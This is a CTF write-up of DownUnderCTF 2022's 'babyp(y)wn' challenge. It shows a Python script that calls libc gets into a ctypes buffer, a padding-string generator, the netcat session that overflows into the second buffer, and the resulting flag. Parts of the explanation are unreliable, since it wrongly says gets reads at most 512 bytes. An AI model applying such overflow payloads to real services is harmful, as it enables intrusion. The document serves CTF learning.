DownUnderCTF 2022 - babyp(y)wn

babyp(y)wn is a pwn challenge that was part of the 2022 DownUnder CTF. To get the flag, we need to exploit a buffer overflow vulnerability in a python script. The script runs as a service on a remote server, but we got the source code.

File

babypwn.py

#!/usr/bin/env python3

from ctypes import CDLL, c_buffer
libc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
buf1 = c_buffer(512)
buf2 = c_buffer(512)
libc.gets(buf1)
if b'DUCTF' in bytes(buf2):
    print(open('./flag.txt', 'r').read())

Vulnerability

The script is vulnerable to a buffer overflow. The gets function reads up to 512 bytes from the standard input and stores them in the buffer buf1. The buffer buf2 is located right after buf1 on the stack. The script checks if the buf2 contains the string “DUCTF” and if it does, it prints the flag. If we can overwrite buf2 with the string “DUCTF”, we will get the flag.

Execution of the Exploit

getString.py

#!/usr/bin/env python
print("b'" + "p2o-" * (512 // 4) + "DUCTF'")

Command:

./getString.py

Output:

b'p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-
p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2
o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-
p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2
o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-
p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2
o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-
p2o-p2o-p2o-p2o-p2o-p2o-DUCTF'

Then we use the string to get the flag:

nc 2022.ductf.dev 30021
b'p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-
p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2
o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-
p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2
o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-
p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2
o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-p2o-
p2o-p2o-p2o-p2o-p2o-p2o-DUCTF'
DUCTF{C_is_n0t_s0_f0r31gn_f0r_incr3d1bl3_pwn3rs}

Flag

The flag is “DUCTF{C_is_n0t_s0_f0r31gn_f0r_incr3d1bl3_pwn3rs}”.